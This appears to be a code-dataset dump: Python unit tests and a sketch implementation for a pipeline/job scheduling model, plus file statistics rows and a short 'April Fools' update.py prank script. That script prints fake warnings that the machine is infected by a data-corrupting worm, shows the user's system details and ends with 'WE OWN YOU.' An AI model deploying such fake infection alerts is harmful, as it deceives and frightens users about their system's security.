models.Job.create(pipeline_id=pipeline.id, status='running')
models.Job.create(pipeline_id=pipeline.id, status='running')
self.assertEqual(len(pipeline.jobs.all()), 3)
self.assertEqual(pipeline.jobs[0].status, 'succeeded')
self.assertEqual(pipeline.jobs[1].status, 'running')
self.assertEqual(pipeline.jobs[2].status, 'running')
result = pipeline.stop()
self.assertTrue(result)
self.assertEqual(pipeline.jobs[0].status, 'succeeded')
self.assertEqual(pipeline.jobs[1].status, 'stopping')
self.assertEqual(pipeline.jobs[2].status, 'stopping')
def test_stop_succeeds_if_all_jobs_succeeded(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
self.assertEqual(len(pipeline.jobs.all()), 3)
result = pipeline.stop()
self.assertTrue(result)
self.assertEqual(pipeline.jobs[0].status, 'succeeded')
self.assertEqual(pipeline.jobs[1].status, 'succeeded')
self.assertEqual(pipeline.jobs[2].status, 'succeeded')
def test_start_single_job_succeeds(self):
pipeline = models.Pipeline.create(status='idle')
job1 = models.Job.create(pipeline_id=pipeline.id)
result = pipeline.start_single_job(job1)
self.assertTrue(result)
self.assertEqual(job1.status, 'running')
self.assertEqual(pipeline.status, 'running')
def test_start_single_job_fails_if_running(self):
pipeline = models.Pipeline.create(status='running')
job1 = models.Job.create(pipeline_id=pipeline.id)
result = pipeline.start_single_job(job1)
self.assertFalse(result)
self.assertEqual(job1.status, 'idle')
self.assertEqual(pipeline.status, 'running')
def test_job_finished_succeeds(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
result = pipeline.job_finished()
self.assertTrue(result)
self.assertEqual(pipeline.status, 'succeeded')
def test_job_finished_fails_if_one_remains(self):
pipeline = models.Pipeline.create(status='running')
models.Job.create(pipeline_id=pipeline.id, status='succeeded')
models.Job.create(pipeline_id=pipeline.id, status='running')
result = pipeline.job_finished()
self.assertFalse(result)
self.assertEqual(pipeline.status, 'running')
def test_job_finished_sets_failed_if_mix_succeeded_and_failed(self):
pipeline = models.Pipeline.create(status='running')
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='failed')
models.StartCondition.create(job_id=job2.id, preceding_job_id=None)
result = pipeline.job_finished()
self.assertTrue(result)
self.assertEqual(pipeline.status, 'failed')
class TestPipelineDestroy(utils.ModelTestCase):
def test_destroy_succeeds(self):
pipeline = models.Pipeline.create()
pipeline.destroy()
self.assertIsNone(models.Pipeline.find(pipeline.id))
def test_destroy_deletes_all_schedules(self):
pipeline = models.Pipeline.create()
sc1 = models.Schedule.create(pipeline_id=pipeline.id)
self.assertIsNotNone(models.Schedule.find(sc1.id))
pipeline.destroy()
self.assertIsNone(models.Schedule.find(sc1.id))
def test_destroy_deletes_all_jobs(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, name='j1')
self.assertIsNotNone(models.Job.find(job1.id))
pipeline.destroy()
self.assertIsNone(models.Job.find(job1.id))
def test_destroy_deletes_all_params(self):
pipeline = models.Pipeline.create()
param1 = models.Param.create(
pipeline_id=pipeline.id,
name='p1',
type='string')
self.assertIsNotNone(models.Param.find(param1.id))
pipeline.destroy()
self.assertIsNone(models.Param.find(param1.id))
class TestPipelineImport(utils.ModelTestCase):
def test_import_data_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create()
job2 = models.Job.create()
data = {
'params': [
{'name': 'p1', 'type': 'string', 'value': 'foo'},
{'name': 'p2', 'type': 'string', 'value': 'bar'},
],
'schedules': [
{'id': None, 'cron': 'NEW1'},
{'id': None, 'cron': 'NEW2'},
],
'jobs': [
{'id': job1.id, 'name': 'j1', 'hash_start_conditions': []},
{'id': job2.id, 'name': 'j2', 'hash_start_conditions': []},
]
}
pipeline.import_data(data)
self.assertEqual(len(pipeline.params.all()), 2)
self.assertEqual(pipeline.params[0].name, 'p1')
self.assertEqual(pipeline.params[0].value, 'foo')
self.assertEqual(pipeline.params[1].name, 'p2')
self.assertEqual(pipeline.params[1].value, 'bar')
self.assertEqual(len(pipeline.jobs.all()), 2)
self.assertEqual(pipeline.jobs[0].name, 'j1')
self.assertEqual(pipeline.jobs[1].name, 'j2')
class TestJobDestroy(utils.ModelTestCase):
def test_destroy_succeeds(self):
job = models.Job.create()
job.destroy()
self.assertIsNone(models.Job.find(job.id))
def test_destroy_deletes_all_starting_conditions(self):
job1 = models.Job.create()
job2 = models.Job.create()
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id)
self.assertIsNotNone(models.StartCondition.find(sc1.id))
job2.destroy()
self.assertIsNone(models.StartCondition.find(sc1.id))
def test_destroy_deletes_preceding_starting_conditions(self):
job1 = models.Job.create()
job2 = models.Job.create()
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id)
self.assertIsNotNone(models.StartCondition.find(sc1.id))
job1.destroy()
self.assertIsNone(models.StartCondition.find(sc1.id))
def test_destroy_deletes_all_params(self):
job = models.Job.create()
param1 = models.Param.create(
job_id=job.id,
name='p1',
type='string')
self.assertIsNotNone(models.Param.find(param1.id))
job.destroy()
self.assertIsNone(models.Param.find(param1.id))
class TestStartConditionWithJobs(utils.ModelTestCase):
def test_value_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, name='job1')
job2 = models.Job.create(pipeline_id=pipeline.id, name='job2')
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
self.assertEqual(sc1.value, '%s,success' % job1.id)
def test_preceding_job_name_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, name='job1')
job2 = models.Job.create(pipeline_id=pipeline.id, name='job2')
sc1 = models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
self.assertEqual(sc1.preceding_job_name, 'job1')
class TestJobStartConditions(utils.ModelTestCase):
def setUp(self):
super(TestJobStartConditions, self).setUp()
self.testbed = testbed.Testbed()
self.testbed.activate()
# Declare the services this test needs stubbed.
self.testbed.init_memcache_stub()
self.testbed.init_app_identity_stub()
self.testbed.init_taskqueue_stub()
def tearDown(self):
super(TestJobStartConditions, self).tearDown()
self.testbed.deactivate()
def test_create_start_conditions_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job2 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job3 = models.Job.create(pipeline_id=pipeline.id, status='idle')
arg_start_conditions = [
{'preceding_job_id': job1.id, 'condition': 'success'},
{'preceding_job_id': job2.id, 'condition': 'success'},
]
job3.assign_start_conditions(arg_start_conditions)
self.assertEqual(len(job3.start_conditions), 2)
def test_update_start_conditions_succeeds(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job2 = models.Job.create(pipeline_id=pipeline.id, status='idle')
job3 = models.Job.create(pipeline_id=pipeline.id, status='idle')
models.StartCondition.create(
job_id=job3.id,
preceding_job_id=job2.id,
condition='fail')
arg_start_conditions = [
{'preceding_job_id': job1.id, 'condition': 'success'},
{'preceding_job_id': job2.id, 'condition': 'success'},
]
self.assertEqual(len(job3.start_conditions), 1)
self.assertEqual(job3.start_conditions[0].condition, 'fail')
job3.assign_start_conditions(arg_start_conditions)
self.assertEqual(len(job3.start_conditions), 2)
self.assertEqual(job3.start_conditions[0].condition, 'success')
self.assertEqual(job3.start_conditions[1].condition, 'success')
def test_fails_if_running(self):
pipeline = models.Pipeline.create()
job = models.Job.create(pipeline_id=pipeline.id, status='running')
result = job.start()
self.assertFalse(result)
def test_succeeds_if_waiting_without_start_conditions(self):
pipeline = models.Pipeline.create()
job = models.Job.create(pipeline_id=pipeline.id, status='waiting')
result = job.start()
self.assertTrue(result)
def test_succeeds_with_start_condition_fulfill_success_with_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
result = job2.start()
self.assertTrue(result)
def test_fails_with_start_condition_unfulfill_success_with_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
def test_succeeds_with_start_condition_fulfill_fail_with_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='fail')
result = job2.start()
self.assertTrue(result)
def test_fails_with_start_condition_unfulfill_fail_with_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='fail')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
def test_succeeds_with_start_condition_fulfill_whatever_with_failed(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='whatever')
result = job2.start()
self.assertTrue(result)
def test_succeeds_with_start_condition_fulfill_whatever_with_succeeded(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='whatever')
result = job2.start()
self.assertTrue(result)
def test_fails_with_start_condition_unfulfill_whatever_with_running(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='running')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='whatever')
result = job2.start()
self.assertFalse(result)
class TestJobStopConditions(utils.ModelTestCase):
def test_stop_fails_with_idle(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='idle')
result = job1.stop()
self.assertFalse(result)
self.assertEqual(job1.status, 'idle')
def test_stop_succeeds_with_waiting(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
result = job1.stop()
self.assertTrue(result)
self.assertEqual(job1.status, 'failed')
def test_stop_succeeds_with_running(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='running')
result = job1.stop()
self.assertTrue(result)
self.assertEqual(job1.status, 'stopping')
class TestJobStartWithDependentJobs(utils.ModelTestCase):
def setUp(self):
super(TestJobStartWithDependentJobs, self).setUp()
self.testbed = testbed.Testbed()
self.testbed.activate()
# Declare the services this test needs stubbed.
self.testbed.init_memcache_stub()
self.testbed.init_app_identity_stub()
self.testbed.init_taskqueue_stub()
def tearDown(self):
super(TestJobStartWithDependentJobs, self).tearDown()
self.testbed.deactivate()
def test_start_fails_with_dependent_jobs_and_expecting_success(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='failed')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
job3 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='success')
models.StartCondition.create(
job_id=job3.id,
preceding_job_id=job2.id,
condition='success')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
self.assertEqual(job3.status, 'failed')
def test_start_fails_with_dependent_jobs_and_expecting_fail(self):
pipeline = models.Pipeline.create()
job1 = models.Job.create(pipeline_id=pipeline.id, status='succeeded')
job2 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
job3 = models.Job.create(pipeline_id=pipeline.id, status='waiting')
models.StartCondition.create(
job_id=job2.id,
preceding_job_id=job1.id,
condition='fail')
models.StartCondition.create(
job_id=job3.id,
preceding_job_id=job2.id,
condition='success')
result = job2.start()
self.assertFalse(result)
self.assertEqual(job2.status, 'failed')
self.assertEqual(job3.status, 'failed')
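The start-condition tests above pin down a small state machine: 'success' requires the preceding job to have succeeded, 'fail' requires it to have failed, 'whatever' accepts either finished state, an unfinished preceding job leaves the dependent waiting, and a violated condition fails the job and, transitively, its dependents. For orientation, here is a minimal in-memory sketch consistent with those assertions; the names echo the tests, but every implementation detail is an assumption, not the project's actual ORM-backed code.
# A minimal sketch (assumption): in-memory stand-ins consistent with the
# start-condition tests above, not the project's actual models.
FINISHED = ('succeeded', 'failed')

class SketchJob(object):
  def __init__(self):
    self.status = 'waiting'
    self.start_conditions = []  # (preceding_job, condition) pairs
    self.dependent_jobs = []    # jobs whose conditions point at this one

  def start(self):
    if self.status not in ('idle', 'waiting'):
      return False
    for preceding, condition in self.start_conditions:
      if preceding.status not in FINISHED:
        return False  # not decidable yet: stay 'waiting'
      if condition == 'success' and preceding.status != 'succeeded':
        return self._cancel()
      if condition == 'fail' and preceding.status != 'failed':
        return self._cancel()
      # condition == 'whatever' accepts any finished status
    self.status = 'running'
    return True

  def _cancel(self):
    # A violated condition fails this job and, transitively, its dependents.
    self.status = 'failed'
    for job in self.dependent_jobs:
      job._cancel()
    return False
Chaining three jobs with 'success' conditions and failing the first reproduces the cascade asserted in TestJobStartWithDependentJobs: the second job's start() returns False and both downstream jobs end up 'failed'.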
| 37.44316 | 79 | 0.715484 | 2,420 | 19,433 | 5.578926 | 0.080165 | 0.085179 | 0.069995 | 0.101326 | 0.852974 | 0.806237 | 0.751574 | 0.710836 | 0.690616 | 0.659951 | 0 | 0.012453 | 0.157052 | 19,433 | 518 | 80 | 37.515444 | 0.811733 | 0.036073 | 0 | 0.712644 | 0 | 0 | 0.059528 | 0.002244 | 0 | 0 | 0 | 0 | 0.232184 | 1 | 0.110345 | false | 0 | 0.016092 | 0 | 0.144828 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
ccc34ecae49eb2a4843e07a512a9a86fbb56d033 | 49 | py | Python | trainer.py | OuedraogoAbdoul/student-evaluation-courses | aea571385ccc7b5580f38b730d46060e9c9ee343 | ["MIT"] | null | null | null | trainer.py | OuedraogoAbdoul/student-evaluation-courses | aea571385ccc7b5580f38b730d46060e9c9ee343 | ["MIT"] | null | null | null | trainer.py | OuedraogoAbdoul/student-evaluation-courses | aea571385ccc7b5580f38b730d46060e9c9ee343 | ["MIT"] | null | null | null |
from processing.preprocessor import Preprocessor
| 24.5 | 48 | 0.897959 | 5 | 49 | 8.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081633 | 49 | 1 | 49 | 49 | 0.977778 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ccd00e5b53c025ca69b8f0e77113514f41315839 | 1,662 | py | Python | update.py | JJFReibel/AprilFoolsScript | 2c68c04b5c56e4961a2404d1eb3d77a79154d836 | ["MIT"] | null | null | null | update.py | JJFReibel/AprilFoolsScript | 2c68c04b5c56e4961a2404d1eb3d77a79154d836 | ["MIT"] | null | null | null | update.py | JJFReibel/AprilFoolsScript | 2c68c04b5c56e4961a2404d1eb3d77a79154d836 | ["MIT"] | null | null | null |
# April Fools Script
# By Jean-Jacques F. Reibel
# I will not be held responsible for:
# any shenanigans
import os
import platform
import getpass
os.system("printf '\n\e[1;31;5;5m WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING!\n'")
os.system("printf '\e[0;33;1;1m YOUR SYSTEM IS INFECTED.\n'")
os.system("printf '\e[0;36;1;1m PYTHON WORM IS DOWNLOADING AND CORRUPTING ALL DATA \n'")
os.system("printf '\e[0;35;1;1m FOLLOWED BY FULL SYSTEM SHUTDOWN.\n\n'")
os.system("printf '\e[0;31;1;1m'")
print("Computer Name:"+ " "*19 + str(platform.node()))
print(str("Operating System:" + " "*16 + platform.system()))
print(str("Operating System Release:" + " "*8 + platform.release()))
print(str("Operating System Version:" + " "*8 + platform.platform()))
print(str("User Name:" + " "*23) + getpass.getuser())
os.system("printf '\e[1;32;1;1m\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~('")
os.system("printf '\e[0;33;1;1m°'")
os.system("printf '\e[0;31;1;1m<'")
os.system("printf '\e[0;31;1;5m~\n'")
os.system("printf '\e[0;37;1;5m\n ¯'")
os.system("printf '\e[0;31;1;5m\_'")
os.system("printf '\e[0;33;1;5m('")
os.system("printf '\e[0;34;1;5mツ'")
os.system("printf '\e[0;33;1;5m)'")
os.system("printf '\e[0;31;1;5m_/'")
os.system("printf '\e[0;37;1;5m¯\n'")
os.system("printf '\e[0;33;1;5m\n'")
os.system("printf '\e[0;34;1;1m WE OWN YOU. \n\n'")
os.system("printf '\e[0;31;1;5m ~'")
os.system("printf '\e[0;31;1;1m>'")
os.system("printf '\e[0;33;1;1m°'")
os.system("printf '\e[1;32;1;1m)~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n'")
os.system("printf '\e[1;31;5;5m WARNING! WARNING! WARNING! WARNING! WARNING! WARNING! WARNING!\n\n'")
| 44.918919 | 101 | 0.608303 | 299 | 1,662 | 3.38796 | 0.237458 | 0.181639 | 0.317868 | 0.325765 | 0.561698 | 0.561698 | 0.513327 | 0.507404 | 0.435341 | 0.363277 | 0 | 0.08339 | 0.112515 | 1,662 | 36 | 102 | 46.166667 | 0.600678 | 0.057762 | 0 | 0.064516 | 0 | 0.129032 | 0.627803 | 0.060218 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.064516 | 0.096774 | 0 | 0.096774 | 0.903226 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 6 |